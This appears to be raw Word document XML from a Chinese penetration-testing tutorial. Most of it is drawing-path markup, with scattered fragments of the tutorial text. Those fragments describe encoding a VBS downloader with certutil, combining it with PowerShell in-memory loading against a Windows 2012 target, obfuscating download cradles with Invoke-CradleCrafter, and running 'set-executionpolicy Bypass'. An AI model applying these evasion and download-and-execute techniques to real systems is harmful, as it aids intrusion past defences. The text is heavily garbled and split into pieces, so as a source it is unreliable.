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5.500pt;margin-top:310.500pt;width:246.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1110,6210" coordsize="4930,250">
        <v:shape style="position:absolute;left:1110;top:6210;width:4930;height:250" coordorigin="1110,6210" coordsize="4930,250" path="m1120,6237l1120,6237,1120,6237,1120,6237,1120,6237,1120,6237,1120,6237,1120,6237,1121,6237,1121,6237,1122,6237,1122,6237,1123,6237,1125,6237,1126,6237,1128,6237,1129,6237,1132,6237,1134,6237,1137,6237,1140,6237,1143,6237,1147,6237,1151,6237,1155,6237,1160,6237,1165,6237,1171,6237,1177,6237,1184,6237,1191,6237,1198,6237,1207,6237,1215,6237,1225,6237,1234,6237,1245,6237,1256,6237,1268,6237,1280,6237,1293,6237,1307,6237,1321,6237,1336,6237,1352,6237,1368,6237,1386,6237,1404,6237,1423,6237,1443,6237,1463,6237,1485,6237,1507,6237,1530,6237,1554,6237,1580,6237,1606,6237,1633,6237,1661,6237,1690,6237,1719,6237,1751,6237,1783,6237,1816,6237,1850,6237,1885,6237,1922,6237,1959,6237,1998,6237,2038,6237,2079,6237,2121,6237,2165,6237,2210,6237,2256,6237,2303,6237,2352,6237,2402,6237,2453,6237,2506,6237,2560,6237,2615,6237,2672,6237,2730,6237,2790,6237,2851,6237,2913,6237,2978,6237,3043,6237,3110,6237,3179,6237,3249,6237,3321,6237,3394,6237,3469,6237,3546,6237,3624,6237,3704,6237,3786,6237,3869,6237,3954,6237,4041,6237,4129,6237,4219,6237,4312,6237,4405,6237,4501,6237,4599,6237,4698,6237,4799,6237,4902,6237,5008,6237,5115,6237,5223,6237,5334,6237,5447,6237,5562,6237,5679,6237,5798,6237,5919,6237,6042,6237,6042,6237,6042,6237,6042,6237,6042,6237,6042,6237,6042,6237,6042,6237,6042,6237,6042,6237,6042,6237,6042,6237,6042,6237,6042,6237,6042,6237,6042,6238,6042,6238,6042,6238,6042,6238,6042,6238,6042,6238,6042,6238,6042,6238,6042,6239,6042,6239,6042,6239,6042,6239,6042,6239,6042,6240,6042,6240,6042,6240,6042,6241,6042,6241,6042,6242,6042,6242,6042,6242,6042,6243,6042,6243,6042,6244,6042,6244,6042,6245,6042,6246,6042,6246,6042,6247,6042,6248,6042,6249,6042,6249,6042,6250,6042,6251,6042,6252,6042,6253,6042,6254,6042,6255,6042,6256,6042,6257,6042,6258,6042,6259,6042,6261,6042,6262,6042,6263,6042,6265,6042,6266,6042,6267,6042,6269,6042,6271,6042,6272,6042,6274,6042,6276,6042,6277,6042,6279,6042,6281,6042,6283,6042,6285,6042,6287,6042,6289,6042,6291,6042,6293,6042,6296,6042,6298,6042,6301,6042,6303,6042,6306,6042,6308,6042,6311,6042,6314,6042,6316,6042,6319,6042,6322,6042,6325,6042,6328,6042,6331,6042,6335,6042,6338,6042,6341,6042,6345,6042,6348,6042,6352,6042,6355,6042,6359,6042,6363,6042,6367,6042,6371,6042,6375,6042,6379,6042,6383,6042,6387,6042,6392,6042,6396,6042,6401,6042,6405,6042,6410,6042,6415,6042,6420,6042,6425,6042,6430,6042,6435,6042,6440,6042,6446,6042,6451,6042,6457,6042,6462,6042,6462,6042,6462,6042,6462,6042,6462,6042,6462,6042,6462,6041,6462,6041,6462,6041,6462,6040,6462,6039,6462,6038,6462,6037,6462,6036,6462,6034,6462,6032,6462,6030,6462,6028,6462,6025,6462,6022,6462,6019,6462,6015,6462,6011,6462,6007,6462,6002,6462,5996,6462,5991,6462,5985,6462,5978,6462,5971,6462,5963,6462,5955,6462,5946,6462,5937,6462,5927,6462,5917,6462,5906,6462,5894,6462,5882,6462,5869,6462,5855,6462,5841,6462,5826,6462,5810,6462,5793,6462,5776,6462,5758,6462,5739,6462,5719,6462,5698,6462,5677,6462,5655,6462,5631,6462,5607,6462,5582,6462,5556,6462,5529,6462,5501,6462,5472,6462,5442,6462,5411,6462,5379,6462,5346,6462,5312,6462,5276,6462,5240,6462,5202,6462,5163,6462,5124,6462,5082,6462,5040,6462,4997,6462,4952,6462,4906,6462,4858,6462,4810,6462,4760,6462,4708,6462,4656,6462,4602,6462,4546,6462,4490,6462,4431,6462,4372,6462,4311,6462,4248,6462,4184,6462,4119,6462,4051,6462,3983,6462,3913,6462,3841,6462,3767,6462,3692,6462,3616,6462,3538,6462,3458,6462,3376,6462,3293,6462,3208,6462,3121,6462,3032,6462,2942,6462,2850,6462,2756,6462,2661,6462,2563,6462,2464,6462,2362,6462,2259,6462,2154,6462,2047,6462,1938,6462,1827,6462,1714,6462,1599,6462,1483,6462,1364,6462,1243,6462,1120,6462,1120,6462,1120,6462,1120,6462,1120,6462,1120,6462,1120,6462,1120,6462,1120,6462,1120,6462,1120,6462,1120,6462,1120,6462,1120,6462,1120,6462,1120,6462,1120,6462,1120,6462,1120,6462,1120,6461,1120,6461,1120,6461,1120,6461,1120,6461,1120,6461,1120,6460,1120,6460,1120,6460,1120,6460,1120,6459,1120,6459,1120,6459,1120,6458,1120,6458,1120,6457,1120,6457,1120,6457,1120,6456,1120,6455,1120,6455,1120,6454,1120,6454,1120,6453,1120,6452,1120,6452,1120,6451,1120,6450,1120,6449,1120,6448,1120,6447,1120,6447,1120,6446,1120,6445,1120,6443,1120,6442,1120,6441,1120,6440,1120,6439,1120,6438,1120,6436,1120,6435,1120,6433,1120,6432,1120,6430,1120,6429,1120,6427,1120,6426,1120,6424,1120,6422,1120,6420,1120,6418,1120,6416,1120,6414,1120,6412,1120,6410,1120,6408,1120,6406,1120,6404,1120,6401,1120,6399,1120,6396,1120,6394,1120,6391,1120,6389,1120,6386,1120,6383,1120,6380,1120,6377,1120,6374,1120,6371,1120,6368,1120,6365,1120,6362,1120,6358,1120,6355,1120,6351,1120,6348,1120,6344,1120,6340,1120,6337,1120,6333,1120,6329,1120,6325,1120,6320,1120,6316,1120,6312,1120,6308,1120,6303,1120,6299,1120,6294,1120,6289,1120,6284,1120,6280,1120,6275,1120,6270,1120,6264,1120,6259,1120,6254,1120,6248,1120,6243,1120,6237e x" fillcolor="#f5f7f8" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:55.500pt;margin-top:330.500pt;width:120.500pt;height:11.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1110,6610" coordsize="2410,230">
        <v:shape style="position:absolute;left:1110;top:6610;width:2410;height:230" coordorigin="1110,6610" coordsize="2410,230" path="m1120,6627l1120,6627,1120,6627,1120,6627,1120,6627,1120,6627,1120,6627,1120,6627,1120,6627,1120,6627,1121,6627,1121,6627,1121,6627,1122,6627,1123,6627,1123,6627,1124,6627,1125,6627,1127,6627,1128,6627,1129,6627,1131,6627,1133,6627,1135,6627,1137,6627,1139,6627,1142,6627,1145,6627,1148,6627,1151,6627,1154,6627,1158,6627,1162,6627,1166,6627,1171,6627,1176,6627,1181,6627,1186,6627,1192,6627,1198,6627,1204,6627,1211,6627,1218,6627,1225,6627,1233,6627,1241,6627,1249,6627,1258,6627,1268,6627,1277,6627,1287,6627,1298,6627,1309,6627,1320,6627,1332,6627,1344,6627,1357,6627,1370,6627,1383,6627,1398,6627,1412,6627,1427,6627,1443,6627,1459,6627,1476,6627,1493,6627,1511,6627,1529,6627,1548,6627,1568,6627,1588,6627,1608,6627,1630,6627,1651,6627,1674,6627,1697,6627,1721,6627,1745,6627,1770,6627,1796,6627,1822,6627,1849,6627,1877,6627,1905,6627,1934,6627,1964,6627,1995,6627,2026,6627,2058,6627,2091,6627,2124,6627,2158,6627,2193,6627,2229,6627,2266,6627,2303,6627,2341,6627,2380,6627,2420,6627,2461,6627,2502,6627,2544,6627,2588,6627,2632,6627,2677,6627,2722,6627,2769,6627,2817,6627,2865,6627,2915,6627,2965,6627,3016,6627,3068,6627,3121,6627,3176,6627,3231,6627,3287,6627,3344,6627,3402,6627,3461,6627,3521,6627,3521,6627,3521,6627,3521,6627,3521,6627,3521,6627,3521,6627,3521,6627,3521,6627,3521,6627,3521,6627,3521,6627,3521,6628,3521,6628,3521,6628,3521,6628,3521,6628,3521,6628,3521,6628,3521,6628,3521,6628,3521,6628,3521,6629,3521,6629,3521,6629,3521,6629,3521,6629,3521,6630,3521,6630,3521,6630,3521,6631,3521,6631,3521,6631,3521,6632,3521,6632,3521,6633,3521,6633,3521,6634,3521,6634,3521,6635,3521,6635,3521,6636,3521,6637,3521,6637,3521,6638,3521,6639,3521,6640,3521,6640,3521,6641,3521,6642,3521,6643,3521,6644,3521,6645,3521,6646,3521,6647,3521,6648,3521,6650,3521,6651,3521,6652,3521,6653,3521,6655,3521,6656,3521,6658,3521,6659,3521,6661,3521,6662,3521,6664,3521,6666,3521,6668,3521,6669,3521,6671,3521,6673,3521,6675,3521,6677,3521,6679,3521,6681,3521,6684,3521,6686,3521,6688,3521,6691,3521,6693,3521,6696,3521,6698,3521,6701,3521,6704,3521,6707,3521,6709,3521,6712,3521,6715,3521,6718,3521,6722,3521,6725,3521,6728,3521,6731,3521,6735,3521,6738,3521,6742,3521,6746,3521,6749,3521,6753,3521,6757,3521,6761,3521,6765,3521,6769,3521,6773,3521,6778,3521,6782,3521,6786,3521,6791,3521,6796,3521,6800,3521,6805,3521,6810,3521,6815,3521,6820,3521,6825,3521,6831,3521,6836,3521,6841,3521,6847,3521,6852,3521,6852,3521,6852,3521,6852,3521,6852,3521,6852,3521,6852,3520,6852,3520,6852,3520,6852,3520,6852,3519,6852,3519,6852,3518,6852,3518,6852,3517,6852,3516,6852,3515,6852,3514,6852,3512,6852,3511,6852,3509,6852,3508,6852,3506,6852,3503,6852,3501,6852,3499,6852,3496,6852,3493,6852,3489,6852,3486,6852,3482,6852,3478,6852,3474,6852,3470,6852,3465,6852,3460,6852,3454,6852,3449,6852,3443,6852,3436,6852,3430,6852,3423,6852,3415,6852,3407,6852,3399,6852,3391,6852,3382,6852,3373,6852,3363,6852,3353,6852,3343,6852,3332,6852,3320,6852,3309,6852,3296,6852,3284,6852,3271,6852,3257,6852,3243,6852,3228,6852,3213,6852,3197,6852,3181,6852,3164,6852,3147,6852,3129,6852,3111,6852,3092,6852,3073,6852,3053,6852,3032,6852,3011,6852,2989,6852,2966,6852,2943,6852,2920,6852,2895,6852,2870,6852,2845,6852,2818,6852,2791,6852,2764,6852,2735,6852,2706,6852,2676,6852,2646,6852,2614,6852,2582,6852,2550,6852,2516,6852,2482,6852,2447,6852,2411,6852,2375,6852,2337,6852,2299,6852,2260,6852,2220,6852,2180,6852,2138,6852,2096,6852,2053,6852,2009,6852,1964,6852,1918,6852,1871,6852,1824,6852,1775,6852,1726,6852,1675,6852,1624,6852,1572,6852,1519,6852,1465,6852,1410,6852,1354,6852,1297,6852,1239,6852,1180,6852,1120,6852,1120,6852,1120,6852,1120,6852,1120,6852,1120,6852,1120,6852,1120,6852,1120,6852,1120,6852,1120,6852,1120,6852,1120,6852,1120,6852,1120,6852,1120,6852,1120,6852,1120,6852,1120,6852,1120,6852,1120,6852,1120,6851,1120,6851,1120,6851,1120,6851,1120,6851,1120,6850,1120,6850,1120,6850,1120,6850,1120,6849,1120,6849,1120,6848,1120,6848,1120,6848,1120,6847,1120,6847,1120,6846,1120,6846,1120,6845,1120,6845,1120,6844,1120,6843,1120,6843,1120,6842,1120,6841,1120,6840,1120,6839,1120,6839,1120,6838,1120,6837,1120,6836,1120,6835,1120,6834,1120,6833,1120,6831,1120,6830,1120,6829,1120,6828,1120,6826,1120,6825,1120,6824,1120,6822,1120,6821,1120,6819,1120,6817,1120,6816,1120,6814,1120,6812,1120,6810,1120,6809,1120,6807,1120,6805,1120,6803,1120,6800,1120,6798,1120,6796,1120,6794,1120,6791,1120,6789,1120,6787,1120,6784,1120,6781,1120,6779,1120,6776,1120,6773,1120,6770,1120,6767,1120,6764,1120,6761,1120,6758,1120,6755,1120,6752,1120,6748,1120,6745,1120,6741,1120,6738,1120,6734,1120,6731,1120,6727,1120,6723,1120,6719,1120,6715,1120,6711,1120,6706,1120,6702,1120,6698,1120,6693,1120,6689,1120,6684,1120,6679,1120,6675,1120,6670,1120,6665,1120,6660,1120,6655,1120,6649,1120,6644,1120,6638,1120,6633,1120,6627e x" fillcolor="#f5f7f8" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:345.600pt;width:467.400pt;height:64.800pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId7" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:429.600pt;width:467.400pt;height:239.400pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId8" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:115.500pt;margin-top:756.500pt;width:156.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2310,15130" coordsize="3130,270">
        <v:shape style="position:absolute;left:2310;top:15130;width:3130;height:270" coordorigin="2310,15130" coordsize="3130,270" path="m2320,15152l2320,15152,2320,15152,2320,15152,2320,15152,2320,15152,2320,15152,2321,15152,2321,15152,2321,15152,2322,15152,2322,15152,2323,15152,2323,15152,2324,15152,2325,15152,2326,15152,2328,15152,2329,15152,2331,15152,2333,15152,2335,15152,2337,15152,2340,15152,2343,15152,2346,15152,2349,15152,2353,15152,2357,15152,2361,15152,2365,15152,2370,15152,2375,15152,2381,15152,2387,15152,2393,15152,2400,15152,2407,15152,2414,15152,2422,15152,2430,15152,2439,15152,2448,15152,2457,15152,2467,15152,2478,15152,2489,15152,2500,15152,2512,15152,2525,15152,2538,15152,2552,15152,2566,15152,2581,15152,2596,15152,2612,15152,2628,15152,2645,15152,2663,15152,2682,15152,2701,15152,2720,15152,2741,15152,2762,15152,2783,15152,2806,15152,2829,15152,2853,15152,2877,15152,2903,15152,2929,15152,2956,15152,2983,15152,3012,15152,3041,15152,3071,15152,3102,15152,3133,15152,3166,15152,3199,15152,3233,15152,3269,15152,3305,15152,3342,15152,3379,15152,3418,15152,3458,15152,3498,15152,3540,15152,3583,15152,3626,15152,3671,15152,3716,15152,3763,15152,3810,15152,3859,15152,3908,15152,3959,15152,4011,15152,4064,15152,4118,15152,4173,15152,4229,15152,4286,15152,4344,15152,4404,15152,4465,15152,4526,15152,4589,15152,4654,15152,4719,15152,4786,15152,4854,15152,4923,15152,4993,15152,5065,15152,5137,15152,5212,15152,5287,15152,5364,15152,5442,15152,5442,15152,5442,15152,5442,15152,5442,15152,5442,15152,5442,15152,5442,15152,5442,15152,5442,15152,5442,15152,5442,15152,5442,15152,5442,15152,5442,15152,5442,15152,5442,15152,5442,15152,5442,15152,5442,15153,5442,15153,5442,15153,5442,15153,5442,15153,5442,15153,5442,15154,5442,15154,5442,15154,5442,15155,5442,15155,5442,15155,5442,15156,5442,15156,5442,15157,5442,15157,5442,15158,5442,15158,5442,15159,5442,15159,5442,15160,5442,15161,5442,15161,5442,15162,5442,15163,5442,15164,5442,15165,5442,15165,5442,15166,5442,15167,5442,15168,5442,15169,5442,15171,5442,15172,5442,15173,5442,15174,5442,15175,5442,15177,5442,15178,5442,15180,5442,15181,5442,15183,5442,15184,5442,15186,5442,15188,5442,15189,5442,15191,5442,15193,5442,15195,5442,15197,5442,15199,5442,15201,5442,15204,5442,15206,5442,15208,5442,15211,5442,15213,5442,15216,5442,15218,5442,15221,5442,15223,5442,15226,5442,15229,5442,15232,5442,15235,5442,15238,5442,15241,5442,15245,5442,15248,5442,15251,5442,15255,5442,15258,5442,15262,5442,15266,5442,15270,5442,15273,5442,15277,5442,15281,5442,15286,5442,15290,5442,15294,5442,15299,5442,15303,5442,15308,5442,15312,5442,15317,5442,15322,5442,15327,5442,15332,5442,15337,5442,15342,5442,15348,5442,15353,5442,15359,5442,15364,5442,15370,5442,15376,5442,15382,5442,15388,5442,15394,5442,15400,5442,15407,5442,15407,5442,15407,5442,15407,5442,15407,5442,15407,5442,15407,5441,15407,5441,15407,5441,15407,5440,15407,5440,15407,5439,15407,5439,15407,5438,15407,5437,15407,5435,15407,5434,15407,5433,15407,5431,15407,5429,15407,5427,15407,5425,15407,5422,15407,5419,15407,5416,15407,5413,15407,5409,15407,5405,15407,5401,15407,5397,15407,5392,15407,5387,15407,5381,15407,5375,15407,5369,15407,5362,15407,5355,15407,5348,15407,5340,15407,5332,15407,5323,15407,5314,15407,5305,15407,5294,15407,5284,15407,5273,15407,5261,15407,5249,15407,5237,15407,5224,15407,5210,15407,5196,15407,5181,15407,5166,15407,5150,15407,5134,15407,5116,15407,5099,15407,5080,15407,5061,15407,5042,15407,5021,15407,5000,15407,4979,15407,4956,15407,4933,15407,4909,15407,4885,15407,4859,15407,4833,15407,4806,15407,4779,15407,4750,15407,4721,15407,4691,15407,4660,15407,4629,15407,4596,15407,4563,15407,4528,15407,4493,15407,4457,15407,4420,15407,4383,15407,4344,15407,4304,15407,4264,15407,4222,15407,4179,15407,4136,15407,4091,15407,4046,15407,3999,15407,3952,15407,3903,15407,3854,15407,3803,15407,3751,15407,3698,15407,3644,15407,3589,15407,3533,15407,3476,15407,3418,15407,3358,15407,3297,15407,3236,15407,3172,15407,3108,15407,3043,15407,2976,15407,2908,15407,2839,15407,2769,15407,2697,15407,2624,15407,2550,15407,2475,15407,2398,15407,2320,15407,2320,15407,2320,15407,2320,15407,2320,15407,2320,15407,2320,15407,2320,15407,2320,15407,2320,15407,2320,15407,2320,15407,2320,15407,2320,15407,2320,15406,2320,15406,2320,15406,2320,15406,2320,15406,2320,15406,2320,15406,2320,15406,2320,15405,2320,15405,2320,15405,2320,15405,2320,15404,2320,15404,2320,15404,2320,15403,2320,15403,2320,15403,2320,15402,2320,15402,2320,15401,2320,15401,2320,15400,2320,15400,2320,15399,2320,15398,2320,15398,2320,15397,2320,15396,2320,15396,2320,15395,2320,15394,2320,15393,2320,15392,2320,15391,2320,15390,2320,15389,2320,15388,2320,15387,2320,15385,2320,15384,2320,15383,2320,15382,2320,15380,2320,15379,2320,15377,2320,15376,2320,15374,2320,15372,2320,15371,2320,15369,2320,15367,2320,15365,2320,15363,2320,15361,2320,15359,2320,15357,2320,15355,2320,15353,2320,15350,2320,15348,2320,15345,2320,15343,2320,15340,2320,15338,2320,15335,2320,15332,2320,15329,2320,15326,2320,15323,2320,15320,2320,15317,2320,15314,2320,15310,2320,15307,2320,15304,2320,15300,2320,15296,2320,15293,2320,15289,2320,15285,2320,15281,2320,15277,2320,15273,2320,15269,2320,15264,2320,15260,2320,15255,2320,15251,2320,15246,2320,15241,2320,15236,2320,15232,2320,15226,2320,15221,2320,15216,2320,15211,2320,15205,2320,15200,2320,15194,2320,15188,2320,15182,2320,15177,2320,15170,2320,15164,2320,15158,2320,15152e x" fillcolor="#f7f0f3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第八季中提到了cer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tutil的加密与解密。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38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C:\&gt;certutil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-encode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c:\downfile.vbs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downfile.bat，而配合powershell的内存加载，则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可把cer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tutil发挥更强大。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8"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>靶机：windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-51"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="14"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2012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4149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而今天需要的是一款p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owershell的混淆框架的配合</w:t>
      </w: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https://github.com/danielbo</w:t>
      </w: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hannon/Invoke-CradleCrafter</w:t>
      </w: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使</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="383838"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>用方法：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="18" w:after="0" w:line="327" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="5775" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="22282c"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Import-Module</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:spacing w:val="-40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="22282c"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>./Invoke-CradleCrafter.psd1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="22282c"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Invoke-Cradl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="22282c"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>eCrafter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7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2424" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>如果在加载powershell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脚本的时候提示：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>powershell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-36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进行数字签运行该脚本。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则先执行：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="c5234d"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>set-executionpolicy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="c5234d"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Bypass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74.500pt;margin-top:112.500pt;width:449.500pt;height:47.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2250" coordsize="8990,950">
        <v:shape style="position:absolute;left:1490;top:2250;width:8990;height:950" coordorigin="1490,2250" coordsize="8990,950" path="m1510,2260l1510,2260,1510,2260,1510,2260,1510,2260,1510,2260,1510,2260,1511,2260,1512,2260,1512,2260,1514,2260,1515,2260,1517,2260,1519,2260,1521,2260,1524,2260,1528,2260,1532,2260,1536,2260,1541,2260,1546,2260,1552,2260,1559,2260,1566,2260,1575,2260,1583,2260,1593,2260,1603,2260,1615,2260,1627,2260,1640,2260,1654,2260,1668,2260,1684,2260,1701,2260,1719,2260,1738,2260,1758,2260,1780,2260,1802,2260,1826,2260,1851,2260,1877,2260,1904,2260,1933,2260,1963,2260,1995,2260,2028,2260,2063,2260,2099,2260,2136,2260,2175,2260,2216,2260,2259,2260,2303,2260,2348,2260,2396,2260,2445,2260,2496,2260,2549,2260,2604,2260,2660,2260,2719,2260,2779,2260,2841,2260,2906,2260,2972,2260,3041,2260,3112,2260,3184,2260,3259,2260,3336,2260,3416,2260,3498,2260,3582,2260,3668,2260,3757,2260,3848,2260,3941,2260,4037,2260,4136,2260,4236,2260,4340,2260,4446,2260,4555,2260,4666,2260,4780,2260,4897,2260,5017,2260,5139,2260,5264,2260,5392,2260,5523,2260,5657,2260,5793,2260,5933,2260,6076,2260,6222,2260,6370,2260,6522,2260,6677,2260,6835,2260,6997,2260,7161,2260,7329,2260,7500,2260,7675,2260,7853,2260,8034,2260,8219,2260,8407,2260,8598,2260,8793,2260,8992,2260,9194,2260,9400,2260,9609,2260,9823,2260,10039,2260,10260,2260,10484,2260,10484,2260,10484,2260,10484,2260,10484,2260,10484,2260,10484,2260,10484,2260,10484,2260,10484,2260,10484,2261,10484,2261,10484,2261,10484,2261,10484,2261,10484,2262,10484,2262,10484,2262,10484,2263,10484,2263,10484,2264,10484,2265,10484,2265,10484,2266,10484,2267,10484,2268,10484,2269,10484,2270,10484,2271,10484,2272,10484,2274,10484,2275,10484,2277,10484,2279,10484,2280,10484,2282,10484,2284,10484,2286,10484,2289,10484,2291,10484,2293,10484,2296,10484,2299,10484,2302,10484,2305,10484,2308,10484,2311,10484,2315,10484,2318,10484,2322,10484,2326,10484,2330,10484,2335,10484,2339,10484,2344,10484,2348,10484,2353,10484,2359,10484,2364,10484,2370,10484,2375,10484,2381,10484,2387,10484,2394,10484,2400,10484,2407,10484,2414,10484,2421,10484,2429,10484,2437,10484,2444,10484,2453,10484,2461,10484,2470,10484,2478,10484,2487,10484,2497,10484,2506,10484,2516,10484,2526,10484,2537,10484,2547,10484,2558,10484,2569,10484,2581,10484,2593,10484,2605,10484,2617,10484,2630,10484,2642,10484,2656,10484,2669,10484,2683,10484,2697,10484,2711,10484,2726,10484,2741,10484,2757,10484,2772,10484,2788,10484,2805,10484,2821,10484,2838,10484,2856,10484,2873,10484,2891,10484,2910,10484,2928,10484,2947,10484,2967,10484,2987,10484,3007,10484,3027,10484,3048,10484,3070,10484,3091,10484,3113,10484,3136,10484,3159,10484,3182,10484,3206,10484,3206,10484,3206,10484,3206,10484,3206,10484,3206,10484,3206,10483,3206,10482,3206,10482,3206,10480,3206,10479,3206,10477,3206,10475,3206,10473,3206,10470,3206,10466,3206,10462,3206,10458,3206,10453,3206,10448,3206,10442,3206,10435,3206,10428,3206,10419,3206,10411,3206,10401,3206,10391,3206,10379,3206,10367,3206,10354,3206,10340,3206,10326,3206,10310,3206,10293,3206,10275,3206,10256,3206,10236,3206,10215,3206,10192,3206,10168,3206,10143,3206,10117,3206,10090,3206,10061,3206,10031,3206,9999,3206,9966,3206,9931,3206,9895,3206,9858,3206,9819,3206,9778,3206,9735,3206,9691,3206,9646,3206,9598,3206,9549,3206,9498,3206,9445,3206,9391,3206,9334,3206,9275,3206,9215,3206,9153,3206,9088,3206,9022,3206,8953,3206,8883,3206,8810,3206,8735,3206,8658,3206,8578,3206,8497,3206,8413,3206,8326,3206,8238,3206,8146,3206,8053,3206,7957,3206,7859,3206,7758,3206,7654,3206,7548,3206,7439,3206,7328,3206,7214,3206,7097,3206,6977,3206,6855,3206,6730,3206,6602,3206,6471,3206,6337,3206,6201,3206,6061,3206,5918,3206,5773,3206,5624,3206,5472,3206,5317,3206,5159,3206,4997,3206,4833,3206,4665,3206,4494,3206,4319,3206,4141,3206,3960,3206,3776,3206,3587,3206,3396,3206,3201,3206,3002,3206,2800,3206,2594,3206,2385,3206,2172,3206,1955,3206,1734,3206,1510,3206,1510,3206,1510,3206,1510,3206,1510,3206,1510,3206,1510,3206,1510,3205,1510,3205,1510,3205,1510,3205,1510,3205,1510,3205,1510,3205,1510,3204,1510,3204,1510,3204,1510,3203,1510,3203,1510,3202,1510,3202,1510,3201,1510,3200,1510,3200,1510,3199,1510,3198,1510,3197,1510,3196,1510,3195,1510,3193,1510,3192,1510,3190,1510,3189,1510,3187,1510,3185,1510,3184,1510,3182,1510,3179,1510,3177,1510,3175,1510,3172,1510,3170,1510,3167,1510,3164,1510,3161,1510,3158,1510,3154,1510,3151,1510,3147,1510,3144,1510,3140,1510,3135,1510,3131,1510,3127,1510,3122,1510,3117,1510,3112,1510,3107,1510,3102,1510,3096,